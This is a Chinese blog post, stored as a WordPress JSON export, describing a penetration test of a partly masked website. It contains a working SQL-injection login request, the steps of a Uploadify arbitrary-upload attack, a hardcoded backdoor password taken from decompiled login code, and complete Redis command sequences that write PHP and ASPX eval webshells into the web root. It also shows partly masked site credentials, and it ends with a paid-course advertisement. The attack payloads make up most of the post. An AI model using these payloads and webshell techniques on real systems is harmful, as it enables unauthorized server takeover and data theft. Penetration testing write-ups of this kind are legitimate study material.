{"id":33431,"date":"2025-04-27T12:30:54","date_gmt":"2025-04-27T04:30:54","guid":{"rendered":"https:\/\/www.wsisp.com\/helps\/33431.html"},"modified":"2025-04-27T12:30:54","modified_gmt":"2025-04-27T04:30:54","slug":"%e6%89%8b%e5%b7%a5%e6%bc%8f%e6%b4%9e%e6%8c%96%e6%8e%98%e6%b8%97%e9%80%8f%e6%9f%90%e6%9c%8d%e5%8a%a1%e5%99%a8","status":"publish","type":"post","link":"https:\/\/www.wsisp.com\/helps\/33431.html","title":{"rendered":"\u624b\u5de5\u6f0f\u6d1e\u6316\u6398\u6e17\u900f\u67d0\u670d\u52a1\u5668"},"content":{"rendered":"<p>\u5bf9\u4e8e\u7ed9\u5b9a\u6388\u6743\u7f51\u7ad9\u7684\u6e17\u900f&#xff0c;\u53ef\u4ee5\u901a\u8fc7\u6f0f\u6d1e\u626b\u63cf\u5de5\u5177\u8fdb\u884c\u626b\u63cf&#xff0c;\u4e5f\u53ef\u4ee5\u901a\u8fc7\u624b\u5de5\u6316\u6398&#xff0c;\u7279\u522b\u662f\u83b7\u53d6sql\u6ce8\u5165\u6f0f\u6d1e&#xff0c;\u901a\u8fc7\u6ce8\u5165\u6f0f\u6d1e\u914d\u5408\u5176\u5b83\u6f0f\u6d1e\u6765\u9010\u6b65\u83b7\u53d6webshell&#xff0c;\u751a\u81f3\u670d\u52a1\u5668\u6743\u9650&#xff0c;\u5728\u672c\u6587\u4e2d\u6d89\u53ca\u8be6\u7ec6\u4fe1\u606f\u6536\u96c6\u3001sql\u6ce8\u5165\u3001\u540e\u53f0\u5bc6\u7801\u52a0\u5bc6\u5206\u6790\u3001redis\u6f0f\u6d1e\u5229\u7528\u7b49&#xff0c;\u7b97\u662f\u4e00\u7bc7\u7ecf\u5178\u7684\u624b\u5de5\u6f0f\u6d1e\u6316\u6398\u6e17\u900f\u6848\u4f8b&#xff0c;\u5177\u6709\u5b66\u4e60\u4ef7\u503c\u3002<\/p>\n<h5>1.1\u4fe1\u606f\u6536\u96c6<\/h5>\n<p>1.\u57df\u540d\u4fe1\u606f\u6536\u96c6<\/p>\n<p>&#xff08;1&#xff09;nslookup\u67e5\u8be2<\/p>\n<p>\u901a\u8fc7nslookup\u5bf9 qd.******.*****.cn\u8fdb\u884c\u67e5\u8be2&#xff0c;\u5982\u56fe1\u6240\u793a&#xff0c;\u83b7\u53d6\u7684\u4fe1\u606f\u662fcdn&#xff0c;\u65e0\u6cd5\u83b7\u53d6\u771f\u5b9eIP\u5730\u5740\u4fe1\u606f&#xff0c;\u540e\u9762\u901a\u8fc7https:\/\/www.yougetsignal.com\/tools\/web-sites-on-web-server\/\u8fdb\u884c\u57df\u540d\u67e5\u8be2&#xff0c;\u6bcf\u6b21\u67e5\u8be2\u7684\u57df\u540d\u5bf9\u5e94IP\u5730\u5740\u7ed3\u679c\u90fd\u5728\u53d8\u5316&#xff0c;\u8bf4\u660e\u7528\u4e86cdn\u52a0\u901f\u6280\u672f\u3002<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/04\/20250427043046-680db2f63afd8.jpg\" alt=\"\" \/><\/p>\n<p>\u56fe1dns\u67e5\u8be2<\/p>\n<p>&#xff08;2&#xff09;toolbar.netcraft.com<\/p>\n<p>\u8fd8\u4ee5\u7528toolbar.netcraft.com\u8fdb\u884c\u68c0\u6d4b&#xff1a;https:\/\/toolbar.netcraft.com\/site_report?url&#061;qd.******.*****.cn#last_reboot&#xff0c;\u5176\u7ed3\u679c\u5982\u56fe2\u6240\u793a&#xff0c;IP\u5730\u5740\u4e3a122.72.**.1**\u3002<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/04\/20250427043046-680db2f67b04a.jpg\" alt=\"\" \/><\/p>\n<p>\u56fe2toolbar\u67e5\u8be2ip\u5730\u5740<\/p>\n<p>2.\u83b7\u53d6\u771f\u5b9eIP\u5730\u5740<\/p>\n<p>\u76ee\u6807\u7ad9\u70b9**.******.*****.cn\u4f7f\u7528\u8d26\u53f7\u548c\u5bc6\u7801&#xff08;1773**5216 \/zyl**29122&#xff09;\u8fdb\u884c\u767b\u5f55&#xff0c;\u901a\u8fc7burpsuite\u8fdb\u884c\u6293\u5305&#xff0c;\u53d1\u73b0\u6709\u4e00\u4e2a\u83b7\u53d6websocket url\u7684ajax\u8bf7\u6c42&#xff1a;<\/p>\n<p>ws:\/\/***.**.**.**:1234?uid&#061;304519&amp;subscribe&#061;1&amp;ticks&#061;636570586031103379&amp;stock&#061;&amp;key&#061;89853473962f954c0c9aa96e13f55f22<\/p>\n<p>3.\u4f7f\u7528masscan\u8fdb\u884c\u7aef\u53e3\u626b\u63cf<\/p>\n<p>&#xff08;1&#xff09;masscan\u5b89\u88c5<\/p>\n<p>git clone https:\/\/github.com\/robertdavidgraham\/masscan.git<\/p>\n<p>cd masscan<\/p>\n<p>make<\/p>\n<p>make install<\/p>\n<p>&#xff08;2&#xff09;\u4f7f\u7528masscan\u626b\u63cf\u76ee\u6807\u6240\u6709\u7aef\u53e3\u5730\u5740<\/p>\n<p>masscan -p 1-65535 ***.**.**.** \u626b\u63cf\u540e\u53ef\u4ee5\u770b\u5230\u5176\u7aef\u53e3\u5f00\u653e\u60c5\u51b5&#xff0c;\u5982\u56fe3\u6240\u793a\u3002<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/04\/20250427043046-680db2f6d0728.jpg\" alt=\"\" \/><\/p>\n<p>\u56fe3\u7aef\u53e3\u5f00\u653e\u60c5\u51b5<\/p>\n<p>\u901a\u8fc7\u5b9e\u9645\u8bbf\u95ee&#xff0c;1234\u30011235\u548c7780\u5bf9\u5916\u63d0\u4f9bweb\u670d\u52a1&#xff0c;61315\u4e3a\u8fdc\u7a0b\u7ec8\u7aef&#xff0c;3357\u548c26379\u7ecf\u8fc7telnet\u6216\u8005nc \u53d1\u9001keys *&#xff0c;\u80fd\u786e\u5b9a\u5176\u4e2d\u6709\u4e24\u4e2aredis\u7aef\u53e3&#xff0c;\u5176\u4e2d3357\u7aef\u53e3\u662fredis\u5e76\u4e14\u5b58\u5728\u8ba4\u8bc1&#xff0c;\u901a\u8fc7auth \u201c123456\u201d \u7b80\u5355\u5c1d\u8bd5\u5f31\u53e3\u4ee4\u5931\u8d25\u3002<\/p>\n<p>4.\u83b7\u53d6\u7269\u7406\u8def\u5f84\u4fe1\u606f<\/p>\n<p>\u8f93\u5165\u5730\u5740**.********.com\/Integral\/My\/ProductDetail.aspx?id&#061;1\u5728\u51fa\u9519\u4fe1\u606f\u4e2d\u83b7\u53d6\u5176\u771f\u5b9e\u76ee\u5f55\u5730\u5740\u4e3ad:\\\\www\\\\font\\\\Plugins\\\\IntegralMall.Plugins\\\\Integral\\\\My\\\\ProductDetail.aspx&#xff0c;\u5982\u56fe4\u6240\u793a\u3002<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/04\/20250427043047-680db2f722b3c.jpg\" alt=\"\" \/><\/p>\n<p>\u56fe4\u83b7\u53d6\u771f\u5b9e\u5730\u5740\u4fe1\u606f<\/p>\n<h5>1.2sql\u6ce8\u5165<\/h5>\n<p>1.\u4e3b\u7ad9\u767b\u5f55\u6846\u6ce8\u5165<\/p>\n<p>\u901a\u8fc7burpsuite\u5bf9\u767b\u5f55\u8fc7\u7a0b\u8fdb\u884c\u6293\u5305&#xff0c;\u53d1\u73b0\u5176\u5b58\u5728sql\u6ce8\u5165&#xff0c;\u6784\u9020playload\u8fdb\u884c\u6d4b\u8bd5&#xff1a;<\/p>\n<p>POST \/account\/Login HTTP\/1.1<\/p>\n<p>Host: www.******.*****.cn<\/p>\n<p>Content-Length: 97<\/p>\n<p>Accept: application\/json, text\/javascript, *\/*; q&#061;0.01<\/p>\n<p>Origin: http:\/\/www.******.*****.cn<\/p>\n<p>X-Requested-With: XMLHttpRequest<\/p>\n<p>User-Agent: Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/64.0.3282.186 Safari\/537.36<\/p>\n<p>Content-Type: application\/x-www-form-urlencoded; charset&#061;UTF-8<\/p>\n<p>Referer: http:\/\/www.******.*****.cn\/account\/login?returnurl&#061;%2Fproduct%2Findex%2F908<\/p>\n<p>Accept-Encoding: gzip, deflate<\/p>\n<p>Accept-Language: zh-CN,zh;q&#061;0.9,en;q&#061;0.8<\/p>\n<p>Cookie: ASP.NET_SessionId&#061;ugovwxs3i0bk5yhxjqczcmjq; VerCode&#061;f64aed3c5de2da53ee92698677ceb7abe1f9ab3258abf9472c078259245f48e1<\/p>\n<p>Connection: close<\/p>\n<p>userName&#061;1\u2019,1,1,1);select convert(INT,user)\u2013&#043;&amp;password&#061;123123&amp;validateCode&#061;th5b&amp;rememberMe&#061;false<\/p>\n<p>\u901a\u8fc7\u8be5\u65b9\u6cd5\u53ef\u4ee5\u5bf9\u5f53\u524d\u7684\u7ad9\u70b9\u8fdb\u884c\u6570\u636e\u5e93\u8868\u53ca\u5185\u5bb9\u67e5\u8be2\u3002<\/p>\n<p>2.\u83b7\u53d6\u540e\u53f0\u5bc6\u7801<\/p>\n<p>\u901a\u8fc7\u5927\u5b57\u5178\u5bf9\u540e\u53f0\u8fdb\u884c\u5bc6\u7801\u66b4\u529b\u7834\u89e3&#xff0c;\u83b7\u53d6******.*****.net\u7684admin\u8d26\u53f7\u5bf9\u5e94\u5bc6\u7801abc1234\u3002<\/p>\n<h5>1.3 Uploadify\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e<\/h5>\n<p>1. \u53d1\u73b0\u540e\u53f0\u4f7f\u7528Uploadify<\/p>\n<p>\u901a\u8fc7\u540e\u53f0\u53d1\u73b0\u7ad9\u70b9\u4f7f\u7528\u4e86Uploadify&#xff0c;Uploadify\u7ec4\u4ef6\u4f1a\u5b58\u5728\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e&#xff0c;\u6784\u9020\u53ef\u4e0a\u4f20\u7684html\u6587\u4ef6&#xff0c;\u5176\u4e2daction\u4e3aUploadHandler\u5b9e\u9645\u5730\u5740&#xff0c;\u6709\u7684\u662fUploadHandler.php\u3001UploadHandler.ashx\u7b49&#xff0c;\u672c\u5730\u8bbf\u95ee\u8be5html\u6587\u4ef6&#xff0c;\u76f4\u63a5\u4e0a\u4f20shell&#xff0c;\u5982\u56fe5\u6240\u793a&#xff0c;\u4e0a\u4f20\u6210\u529f\u540e\u4f1a\u663e\u793a\u6587\u4ef6\u540d\u79f0\u7b49\u4fe1\u606f\u3002<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/04\/20250427043047-680db2f76a0c9.jpg\" alt=\"\" \/><\/p>\n<p>\u56fe5\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e<\/p>\n<p>2.\u83b7\u53d6webshell<\/p>\n<p>\u5728\u524d\u9762\u4fdd\u5b58\u7684html\u6587\u4ef6\u4e2d\u53ef\u4ee5\u4efb\u610f\u4e0a\u4f20\u6587\u4ef6&#xff0c;\u4f46\u662f\u9700\u8981\u6ce8\u610f\u5176\u8def\u5f84\u5730\u5740<\/p>\n<p>http:\/\/******.*****.net\/uploadify\/20180418\/7f9e86dd-2454-4a8a-b650-8c167e0eb2a2.asp\u5c06UploadFile\u66f4\u6362\u4e3auploadify\u3002<\/p>\n<p>{\u201cFileName\u201d:\u201c7f9e86dd-2454-4a8a-b650-8c167e0eb2a2.asp\u201d,\u201cFileUrl\u201d:\u201cUploadFile\/20180418\/7f9e86dd-2454-4a8a-b650-8c167e0eb2a2.asp\u201d,\u201cFileAllUrl\u201d:\u201chttp:\/\/******.*****.net\/UploadFile\/20180418\/7f9e86dd-2454-4a8a-b650-8c167e0eb2a2.asp\u201d}<\/p>\n<p>\u8fd9\u4e2a\u5730\u5740\u8bbf\u95ee\u5fc5\u987b\u662f0&#xff0c;\u4e5f\u5c31\u662f\u9664false\u5916\u7684\u503c\u624d\u80fd\u6210\u529f\u4e0a\u4f20&#xff0c;\u5982\u56fe6\u6210\u529f\u83b7\u53d6webshell\u3002<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/04\/20250427043047-680db2f7b5d11.jpg\" alt=\"\" \/><\/p>\n<p>\u56fe6\u83b7\u53d6webshell<\/p>\n<h5>1.4\u540e\u53f0\u5bc6\u7801\u52a0\u5bc6\u5206\u6790<\/h5>\n<p>1.\u6253\u5305\u5e76\u4e0b\u8f7d\u7f51\u7ad9\u6e90\u4ee3\u7801<\/p>\n<p>\u901a\u8fc7webshell\u5bf9\u8be5\u7ad9\u70b9\u8fdb\u884c\u6253\u5305\u538b\u7f29\u547d\u4ee4&#xff1a;rar a \u2013k \u2013r \u2013r \u2013m1 e:\\\\www\\\\all.rar e:\\\\www\\\\website\\\\&#xff0c;\u7136\u540e\u5c06\u5176\u538b\u7f29\u5305\u4e0b\u8f7d\u5230\u672c\u5730\u3002<\/p>\n<p>2.\u5bc6\u7801\u52a0\u5bc6\u51fd\u6570\u5206\u6790<\/p>\n<p>\u901a\u8fc7Reflector\u5bf9asp.net\u7684dll\u6587\u4ef6\u8fdb\u884c\u53cd\u7f16\u8bd1&#xff0c;\u83b7\u53d6\u5176\u6e90\u4ee3\u7801&#xff0c;\u4ece\u6e90\u4ee3\u7801\u4e2d\u67e5\u627e\u767b\u5f55\u52a0\u5bc6\u7684\u51fd\u6570&#xff1a;<\/p>\n<p>public static string MD5Encrypt(string str)<\/p>\n<p>{<\/p>\n<p>string text &#061; str &#043; \u201c202cb962ac59075b964b07152d234b70\u201d;<\/p>\n<p>string password &#061; text.Substring(0, 32);<\/p>\n<p>string password2 &#061; text.Substring(32);<\/p>\n<p>return (FormsAuthentication.HashPasswordForStoringInConfigFile(password, \u201cMD5\u201d) &#043; FormsAuthentication.HashPasswordForStoringInConfigFile(password2, \u201cMD5\u201d)).ToLower();<\/p>\n<p>}<\/p>\n<p>md5&#xff08;123&#xff09;&#061;202cb962ac59075b964b07152d234b70<\/p>\n<p>\u5bc6\u7801\u91c7\u7528password&#043;123\u7684md5\u52a0\u5bc6&#xff0c;\u5bc6\u7801\u503c\u4e3amd5(password)&#043;md5(123)\u5f97\u5230\u7684\u5b9e\u9645\u4f4d\u6570\u4e3a64\u4f4d\u3002\u771f\u5b9e\u5bc6\u7801\u4e3a1-32\u4f4d\u5b57\u7b26\u4e32&#xff0c;\u5c06\u5176\u8fdb\u884cmd5\u89e3\u5bc6\u5373\u53ef\u3002<\/p>\n<p>3. btnLogin_Click\u767b\u5f55\u68c0\u67e5\u4e2d\u5b58\u5728\u903b\u8f91\u540e\u95e8<\/p>\n<p>protected void btnLogin_Click(object sender, EventArgs e)<\/p>\n<p>{<\/p>\n<p>string text &#061; this.txtUserName.Text.Trim();<\/p>\n<p>string str &#061; this.txtPassword.Text.Trim();<\/p>\n<p>string str2 &#061; this.txtCode.Text.Trim().ToLower();<\/p>\n<p>if (string.Compare(StringHelper.MD5Encrypt(str2), ValidationImage.GetAdminVerifyCode(), StringComparison.OrdinalIgnoreCase) !&#061; 0)<\/p>\n<p>{<\/p>\n<p>MessageBox.Show(this, \u201c\u9a8c\u8bc1\u7801\u8f93\u5165\u6709\u8bef&#xff0c;\u8bf7\u91cd\u65b0\u8f93\u5165&#xff01;\u201d);<\/p>\n<p>return;<\/p>\n<p>}<\/p>\n<p>AdministratorInfo model &#061; Administrator.GetModel(text);<\/p>\n<p>if (model &#061;&#061; null)<\/p>\n<p>{<\/p>\n<p>MessageBox.Show(this, \u201c\u7528\u6237\u540d\u6216\u5bc6\u7801\u8f93\u5165\u6709\u8bef&#xff0c;\u767b\u5f55\u5931\u8d25&#xff01;\u201d);<\/p>\n<p>return;<\/p>\n<p>}<\/p>\n<p>if (model.get_RolesType() !&#061; 1 &amp;&amp; model.get_RolesType() !&#061; 2)<\/p>\n<p>{<\/p>\n<p>MessageBox.Show(this, \u201c\u7528\u6237\u540d\u6216\u5bc6\u7801\u8f93\u5165\u6709\u8bef&#xff0c;\u767b\u5f55\u5931\u8d25&#xff01;\u201d);<\/p>\n<p>return;<\/p>\n<p>}<\/p>\n<p>if (string.Compare(StringHelper.MD5Encrypt(str).ToLower(), StringHelper.MD5Encrypt(\u201c7CAB2C0E99AEFDE6255F804B87155FE7BBA5AE03112223\u201d).ToLower(), StringComparison.OrdinalIgnoreCase) !&#061; 0 &amp;&amp; string.Compare(StringHelper.MD5Encrypt(str), model.get_AdminPassWord(), StringComparison.OrdinalIgnoreCase) !&#061; 0)<\/p>\n<p>{<\/p>\n<p>MessageBox.Show(this, \u201c\u7528\u6237\u540d\u6216\u5bc6\u7801\u8f93\u5165\u6709\u8bef&#xff0c;\u767b\u5f55\u5931\u8d25&#xff01;\u201d);<\/p>\n<p>return;<\/p>\n<p>}<\/p>\n<p>if (model.get_IsLock())<\/p>\n<p>{<\/p>\n<p>MessageBox.Show(this, \u201c\u7528\u6237\u5df2\u7981\u6b62\u767b\u5f55&#xff0c;\u8bf7\u8054\u7cfb\u7cfb\u7edf\u7ba1\u7406\u5458&#xff01;\u201d);<\/p>\n<p>return;<\/p>\n<p>}<\/p>\n<p>AdminPrincipal adminPrincipal &#061; new AdminPrincipal();<\/p>\n<p>adminPrincipal.set_AdministratorID(model.get_AdministratorID());<\/p>\n<p>adminPrincipal.set_AdminName(model.get_AdminName());<\/p>\n<p>adminPrincipal.set_RolesType(model.get_RolesType());<\/p>\n<p>adminPrincipal.set_SyRolesID(model.get_SyRolesID());<\/p>\n<p>adminPrincipal.set_TrueName(model.get_AdminName());<\/p>\n<p>adminPrincipal.set_Roles(model.get_RolesType().ToString());<\/p>\n<p>string userData &#061; adminPrincipal.SerializeToString();<\/p>\n<p>Administrator.UpdateLoginLast(model.get_AdministratorID());<\/p>\n<p>FormsAuthenticationTicket formsAuthenticationTicket &#061; new FormsAuthenticationTicket(1, adminPrincipal.get_AdministratorID().ToString(), DateTime.Now, DateTime.Now.AddMinutes((double)SiteConfig.get_SecurityConfig().get_TicketTime()), false, userData);<\/p>\n<p>ManageCookies.CreateAdminCookie(formsAuthenticationTicket, false, DateTime.Now);<\/p>\n<p>BasePage.ResponseRedirect(\u201cAdmin_Index.aspx\u201d);<\/p>\n<p>}<\/p>\n<p>\u8be5\u51fd\u6570\u4e2d\u5b58\u5728\u903b\u8f91\u540e\u95e8&#xff0c;\u4f7f\u7528\u4efb\u4f55\u8d26\u53f7\u5747\u53ef\u4ee5\u8fdb\u884c\u767b\u5f55<\/p>\n<p>\u7528\u6237\u540d&#xff1a;\u968f\u610f \u5bc6\u7801\u4e3a&#xff1a;7CAB2C0E99AEFDE6255F804B87155FE7BBA5AE03112223<\/p>\n<h5>1.5redis\u6f0f\u6d1e\u5229\u7528\u83b7\u53d6webshell<\/h5>\n<p>1. redis\u8d26\u53f7\u83b7\u53d6webshell<\/p>\n<p>\u77e5\u9053\u7f51\u7ad9\u7684\u771f\u5b9e\u8def\u5f84&#xff0c;\u5177\u4f53\u6b65\u9aa4&#xff1a;<\/p>\n<p>&#xff08;1&#xff09;\u8fde\u63a5\u5ba2\u6237\u7aef\u548c\u7aef\u53e3<\/p>\n<p>telnet ***.**.**.** 3357<\/p>\n<p>&#xff08;2&#xff09;\u8ba4\u8bc1<\/p>\n<p>auth ^123456$<\/p>\n<p>&#xff08;3&#xff09;\u67e5\u770b\u5f53\u524d\u7684\u914d\u7f6e\u4fe1\u606f&#xff0c;\u5e76\u590d\u5236\u4e0b\u6765\u7559\u5f85\u540e\u7eed\u6062\u590d<\/p>\n<p>config get dir<\/p>\n<p>config get dbfilename<\/p>\n<p>&#xff08;4&#xff09;\u914d\u7f6e\u5e76\u5199\u5165webshell<\/p>\n<p>config set dir E:\/www\/font<\/p>\n<p>config set dbfilename redis.aspx<\/p>\n<p>set webshell \u201c&lt;?php phpinfo(); ?&gt;\u201d<\/p>\n<p>\/\/php\u67e5\u770b\u4fe1\u606f<\/p>\n<p>set webshell &#034;&lt;?php &#064;eval($\\\\\\\\\\\\_POST\\\\\\\\\\\\[&#039;chopper&#039;\\\\\\\\\\\\]);?&gt; &#034;<\/p>\n<p>\/\/phpwebshell<\/p>\n<p>set webshell&#034;&lt;%eval(Request.Item[\u2018cmd\u2019],\\\\\u201cunsafe\\\\\u201d);%&gt;&#034;<\/p>\n<p>\/\/ aspx\u7684webshell&#xff0c;\u6ce8\u610f\u53cc\u5f15\u53f7\u4f7f\u7528\\\\&#034;<\/p>\n<p>save<\/p>\n<p>\u4fdd\u5b58<\/p>\n<p>get a<\/p>\n<p>\u67e5\u770b\u6587\u4ef6\u5185\u5bb9<\/p>\n<p>&#xff08;5&#xff09;\u8bbf\u95eewebshell\u5730\u5740<\/p>\n<p>\u51fa\u73b0\u7c7b\u4f3c&#xff1a;<\/p>\n<p>REDIS0006?webshell\u2019a&#064;H\uf8f5\u6400???<\/p>\n<p>\u8868\u660e\u6b63\u786e\u83b7\u53d6webshell<\/p>\n<p>&#xff08;6&#xff09;\u6062\u590d\u539f\u59cb\u8bbe\u7f6e<\/p>\n<p>config get dir<\/p>\n<p>config get dbfilename<\/p>\n<p>flushdb<\/p>\n<p>2.\u83b7\u53d6shell\u7684\u5b8c\u6574\u547d\u4ee4<\/p>\n<p>telnet ***.**.**.** 3357<\/p>\n<p>auth ^123456$<\/p>\n<p>config get dir<\/p>\n<p>config get dbfilename<\/p>\n<p>config set dir E:\/www\/font<\/p>\n<p>config set dbfilename redis2.aspx<\/p>\n<p>set webshell \u201c&lt;?php phpinfo(); ?&gt;\u201d<\/p>\n<p>set webshell &#034;&lt;?php &#064;eval($\\\\\\\\\\\\_POST\\\\\\\\\\\\[&#039;chopper&#039;\\\\\\\\\\\\]);?&gt; &#034;<\/p>\n<p>set a \u201c&lt;%&#064; Page Language&#061;\\\\\u201cJscript\\\\\u201d%&gt;&lt;%eval(Request.Item[\\\\\u201cc\\\\\u201d],\\\\\u201cunsafe\\\\\u201d);%&gt;\u201d<\/p>\n<p>save<\/p>\n<p>get a<\/p>\n<p>config set dir<\/p>\n<p>config set dbfilename<\/p>\n<p>flushdb<\/p>\n<p>\u901a\u8fc7\u4ee5\u4e0a\u65b9\u6cd5\u6210\u529f\u83b7\u53d6\u76ee\u6807\u7ad9\u70b9\u7684webshell&#xff0c;\u81f3\u6b64\u6e17\u900f\u7ed3\u675f\u3002<\/p>\n<h5>1.6\u6e17\u900f\u603b\u7ed3<\/h5>\n<p>\u672c\u6b21\u6e17\u900f\u7528\u5230\u4e86\u591a\u4e2a\u6280\u672f:<\/p>\n<p>1.burpsuite\u6293\u5305&#xff0c;\u5bf9\u5305\u6587\u4ef6&#xff0c;\u4f7f\u7528sqlmap\u8fdb\u884c\u6ce8\u5165sqlmap \u2013r r.txt<\/p>\n<p>2.\u540e\u53f0\u8d26\u53f7\u7684\u66b4\u529b\u7834\u89e3&#xff0c;\u901a\u8fc7burpsuite\u5bf9\u8d26\u53f7\u8fdb\u884c\u66b4\u529b\u7834\u89e3\u3002<\/p>\n<p>3. uploadify\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e<\/p>\n<p>4.\u540e\u53f0\u52a0\u5bc6\u6587\u4ef6\u5bc6\u7801\u7b97\u6cd5\u53ca\u5bc6\u7801\u7834\u89e3\u5206\u6790<\/p>\n<p>5.redis\u6f0f\u6d1e\u83b7\u53d6webshell\u65b9\u6cd5<\/p>\n<p>6.masscan\u53canmap\u5168\u7aef\u53e3\u626b\u63cf<\/p>\n<p>&#xff08;1&#xff09;massscan \u2013p 1-65535 ***.**.**.**<\/p>\n<p>&#xff08;2&#xff09;nmap.exe -p 1-65535 -T4 -A -v -oX ***.**.**.xml ***.**.**.1-254<\/p>\n<p>\u521b\u4f5c\u4e0d\u6613&#xff0c;\u7528\u60a8\u53d1\u8d22\u7684\u5c0f\u624b\u5173\u6ce8\u3001\u559c\u6b22&#043;\u6536\u85cf\u4e00\u4e0b\u6211&#xff0c;\u60a8\u7684\u5173\u6ce8\u548c\u70b9\u8d5e\u5c31\u662f\u5bf9\u6211\u7ee7\u7eed\u521b\u4f5c\u7684\u6700\u5927\u52a8\u529b&#xff0c;\u8c22\u8c22&#xff01;<\/p>\n<p>\u53e6\u5916\u63a8\u51fa\u300a\u5b9e\u6218\u4e2d\u768420\u4e2a\u53d6\u8bc1\u6280\u672f\u300b\u89c6\u9891\u8bfe\u7a0b&#xff0c;\u552e\u4ef7298\u5143&#xff0c;\u57fa\u672c\u6db5\u76d6\u76ee\u524d\u7684\u6253\u51fb\u53d6\u8bc1\u9700\u8981&#xff0c;\u53ef\u4ee5\u8054\u7cfb\u5fae\u4fe1lovesec2022\u8d2d\u4e70\u3002<\/p>\n<h2>\u9898\u5916\u8bdd<\/h2>\n<p>\u9ed1\u5ba2&amp;\u7f51\u7edc\u5b89\u5168\u5982\u4f55\u5b66\u4e60<\/p>\n<p>\u4eca\u5929\u53ea\u8981\u4f60\u7ed9\u6211\u7684\u6587\u7ae0\u70b9\u8d5e&#xff0c;\u6211\u79c1\u85cf\u7684\u7f51\u5b89\u5b66\u4e60\u8d44\u6599\u4e00\u6837\u514d\u8d39\u5171\u4eab\u7ed9\u4f60\u4eec&#xff0c;\u6765\u770b\u770b\u6709\u54ea\u4e9b\u4e1c\u897f\u3002<\/p>\n<p>1.\u5b66\u4e60\u8def\u7ebf\u56fe<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/04\/20250427043048-680db2f806533.jpg\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\" \/><\/p>\n<p>\u653b\u51fb\u548c\u9632\u5b88\u8981\u5b66\u7684\u4e1c\u897f\u4e5f\u4e0d\u5c11&#xff0c;\u5177\u4f53\u8981\u5b66\u7684\u4e1c\u897f\u6211\u90fd\u5199\u5728\u4e86\u4e0a\u9762\u7684\u8def\u7ebf\u56fe&#xff0c;\u5982\u679c\u4f60\u80fd\u5b66\u5b8c\u5b83\u4eec&#xff0c;\u4f60\u53bb\u5c31\u4e1a\u548c\u63a5\u79c1\u6d3b\u5b8c\u5168\u6ca1\u6709\u95ee\u9898\u3002<\/p>\n<p>2.\u89c6\u9891\u6559\u7a0b \u7f51\u4e0a\u867d\u7136\u4e5f\u6709\u5f88\u591a\u7684\u5b66\u4e60\u8d44\u6e90&#xff0c;\u4f46\u57fa\u672c\u4e0a\u90fd\u6b8b\u7f3a\u4e0d\u5168\u7684&#xff0c;\u8fd9\u662f\u6211\u4eec\u548c\u7f51\u5b89\u5927\u5382360\u5171\u540c\u7814\u53d1\u7684\u7f51\u5b89\u89c6\u9891\u6559\u7a0b&#xff0c;\u4e4b\u524d\u90fd\u662f\u5185\u90e8\u8d44\u6e90&#xff0c;\u4e13\u4e1a\u65b9\u9762\u7edd\u5bf9\u53ef\u4ee5\u79d2\u6740\u56fd\u518599%\u7684\u673a\u6784\u548c\u4e2a\u4eba\u6559\u5b66&#xff01;\u5168\u7f51\u72ec\u4e00\u4efd&#xff0c;\u4f60\u4e0d\u53ef\u80fd\u5728\u7f51\u4e0a\u627e\u5230\u8fd9\u4e48\u4e13\u4e1a\u7684\u6559\u7a0b\u3002<\/p>\n<p>\u5185\u5bb9\u6db5\u76d6\u4e86\u5165\u95e8\u5fc5\u5907\u7684\u64cd\u4f5c\u7cfb\u7edf\u3001\u8ba1\u7b97\u673a\u7f51\u7edc\u548c\u7f16\u7a0b\u8bed\u8a00\u7b49\u521d\u7ea7\u77e5\u8bc6&#xff0c;\u800c\u4e14\u5305\u542b\u4e86\u4e2d\u7ea7\u7684\u5404\u79cd\u6e17\u900f\u6280\u672f&#xff0c;\u5e76\u4e14\u8fd8\u6709\u540e\u671f\u7684CTF\u5bf9\u6297\u3001\u533a\u5757\u94fe\u5b89\u5168\u7b49\u9ad8\u9636\u6280\u672f\u3002\u603b\u5171200\u591a\u8282\u89c6\u9891&#xff0c;200\u591aG\u7684\u8d44\u6e90&#xff0c;\u4e0d\u7528\u62c5\u5fc3\u5b66\u4e0d\u5168\u3002 <img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/04\/20250427043051-680db2fb8aebe.gif\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\" \/> \u56e0\u7bc7\u5e45\u6709\u9650&#xff0c;\u4ec5\u5c55\u793a\u90e8\u5206\u8d44\u6599&#xff0c;\u9700\u8981\u89c1\u4e0b\u56fe\u5373\u53ef\u524d\u5f80\u83b7\u53d6 <img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/04\/20250427043051-680db2fbba8e9.bmp\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\" \/><\/p>\n<p>&#x1f435;\u8fd9\u4e9b\u4e1c\u897f\u6211\u90fd\u53ef\u4ee5\u514d\u8d39\u5206\u4eab\u7ed9\u5927\u5bb6&#xff0c;\u9700\u8981\u7684\u53ef\u4ee5\u70b9\u8fd9\u91cc\u81ea\u53d6&#x1f449;:\u7f51\u5b89\u5165\u95e8\u5230\u8fdb\u9636\u8d44\u6e90<\/p>\n<p>3.\u6280\u672f\u6587\u6863\u548c\u7535\u5b50\u4e66 